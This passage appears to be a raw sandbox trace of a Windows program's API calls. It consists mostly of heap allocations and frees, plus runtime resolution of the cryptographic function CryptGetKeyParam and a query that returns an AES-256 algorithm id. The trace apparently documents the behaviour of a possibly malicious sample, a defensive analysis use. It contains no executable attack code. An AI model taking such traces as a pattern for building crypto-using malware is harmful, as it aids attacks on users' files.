hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0077.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0077.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.952] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0077.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0077.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0077.953] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0077.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0077.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0077.953] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0077.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0077.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0077.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0077.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0077.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0077.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0077.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0077.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0077.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0077.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0077.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0077.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0077.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0077.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0077.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0077.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0077.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0077.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0077.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0077.956] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0077.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0077.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0077.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0077.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0077.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0077.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0077.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0077.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0077.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0077.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0077.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0077.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0077.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0077.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0077.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0077.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0077.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0077.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0077.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0077.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0077.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0077.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0077.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0077.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0077.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0077.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0077.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0077.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0077.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0077.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0077.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0077.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0077.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0077.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0077.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0077.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796fc8 [0077.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0077.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0077.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0077.958] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0077.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0077.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0077.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0077.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0077.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0077.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0077.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0077.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0077.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0077.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0077.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0077.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0077.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0077.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0077.959] CryptGetKeyParam (in: hKey=0x41ac500, dwParam=0x7, pbData=0x43e25c0, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e25c0*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0077.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0077.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0077.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0077.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0077.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0077.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0077.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0077.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0077.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0077.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0077.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0077.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0077.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0077.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0077.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0077.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0077.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0077.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0077.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0077.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0077.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0077.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0077.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0077.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0077.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0077.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0077.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0077.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0077.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0077.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0077.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0077.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0077.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0077.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0077.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0077.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0077.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0077.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0077.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0077.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0077.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0077.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0077.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0077.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0077.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0077.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0077.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0077.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0077.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0077.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0077.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0077.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.962] HeapFree (in: 